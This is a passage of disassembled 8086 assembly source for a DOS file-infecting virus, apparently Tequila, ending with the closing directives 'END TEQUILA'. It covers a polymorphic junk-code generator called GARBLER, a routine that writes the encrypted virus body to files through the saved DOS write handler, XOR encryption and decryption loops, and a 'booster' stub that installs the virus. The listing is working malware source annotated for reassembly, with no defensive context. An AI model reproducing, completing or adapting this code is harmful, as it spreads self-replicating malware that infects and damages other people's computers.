||
MOV DX,SI
|
||
INC SI
|
||
CALL GARBLER
|
||
MOV B[SI],CL
|
||
INC SI
|
||
MOV W[SI],BX
|
||
INC SI
|
||
INC SI
|
||
MOV AX,SI
|
||
SUB AX,DX
|
||
DEC AX
|
||
MOV BX,DX
|
||
MOV B[BX],AL
|
||
CALL GARBLER
|
||
CALL GARBLER
|
||
MOV B[SI],0E2
|
||
INC SI
|
||
SUB DI,SI
|
||
DEC DI
|
||
MOV AX,DI
|
||
MOV B[SI],AL
|
||
INC SI
|
||
CALL GARBLER
|
||
RET
|
||
|
||
GARBLER:
|
||
DEC BP
|
||
ES TEST B[BP],0F ;Masm Mod. Needed
|
||
JE RET ;Masm Mod. Needed
|
||
DEC BP
|
||
ES MOV AL,B[BP] ;Masm Mod. Needed
|
||
TEST AL,2
|
||
JE 0A0E ;Masm Mod. Needed
|
||
TEST AL,4
|
||
JE 09F7 ;Masm Mod. Needed
|
||
TEST AL,8
|
||
JE 09F1 ;Masm Mod. Needed
|
||
MOV W[SI],0C789
|
||
INC SI
|
||
INC SI
|
||
JMP RET ;Masm Mod. Needed
|
||
MOV B[SI],090
|
||
INC SI
|
||
JMP RET ;Masm Mod. Needed
|
||
MOV AL,085
|
||
DEC BP
|
||
ES MOV AH,B[BP] ;Masm Mod. Needed
|
||
TEST AH,2
|
||
JE 0A05 ;Masm Mod. Needed
|
||
DEC AL
|
||
OR AH,0C0
|
||
MOV W[SI],AX
|
||
INC SI
|
||
INC SI
|
||
JMP RET ;Masm Mod. Needed
|
||
DEC BP
|
||
ES TEST B[BP],2 ;Masm Mod. Needed
|
||
JE 0A1A ;Masm Mod. Needed
|
||
MOV AL,039
|
||
JMP 09F9 ;Masm Mod. Needed
|
||
MOV B[SI],0FC
|
||
INC SI
|
||
RET
|
||
|
||
MAKE_THE_DISK_WRITE:
|
||
CALL PERFORM_ENCRYPTION_DECRYPTION
|
||
MOV AH,040
|
||
MOV BX,W[09A4]
|
||
MOV DX,0
|
||
MOV CX,09A4
|
||
PUSHF
|
||
CALL D[09B4] ;Masm Mod. Needed
|
||
JB 0A37 ;Masm Mod. Needed
|
||
SUB AX,CX
|
||
PUSHF
|
||
CMP B[0A39],028 ;Masm Mod. Needed
|
||
JNE 0A44 ;Masm Mod. Needed
|
||
MOV B[0A39],0 ;Masm Mod. Needed
|
||
CALL PERFORM_ENCRYPTION_DECRYPTION
|
||
POPF
|
||
RET
|
||
|
||
PERFORM_ENCRYPTION_DECRYPTION:
|
||
MOV BX,0
|
||
MOV SI,0960
|
||
MOV CX,0960
|
||
MOV DL,B[SI]
|
||
XOR B[BX],DL
|
||
INC SI
|
||
INC BX
|
||
CMP SI,09A0
|
||
JB 0A61 ;Masm Mod. Needed
|
||
MOV SI,0960
|
||
LOOP 0A52 ;Masm Mod. Needed
|
||
RET
|
||
|
||
THE_FILE_DECRYPTING_ROUTINE:
|
||
PUSH CS
|
||
POP DS
|
||
MOV BX,4
|
||
MOV SI,0964
|
||
MOV CX,0960
|
||
MOV DL,B[SI]
|
||
ADD B[BX],DL
|
||
INC SI
|
||
INC BX
|
||
CMP SI,09A4
|
||
JB 0A7E ;Masm Mod. Needed
|
||
MOV SI,0964
|
||
LOOP 0A6F ;Masm Mod. Needed
|
||
JMP 0390 ;Masm Mod. Needed
|
||
|
||
;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
|
||
;========== BUT IS MERELY THE BOOSTER. ========
|
||
|
||
START:
|
||
LEA W[0104],EXIT ;Masm Mod. Needed
|
||
MOV W[0106],CS ;Masm Mod. Needed
|
||
MOV BX,CS
|
||
SUB W[0106],BX ;Masm Mod. Needed
|
||
JMP INSTALL
|
||
|
||
EXIT:
|
||
INT 020
|
||
|
||
TEQUILA ENDP
|
||
CODE_SEG ENDS
|
||
END TEQUILA |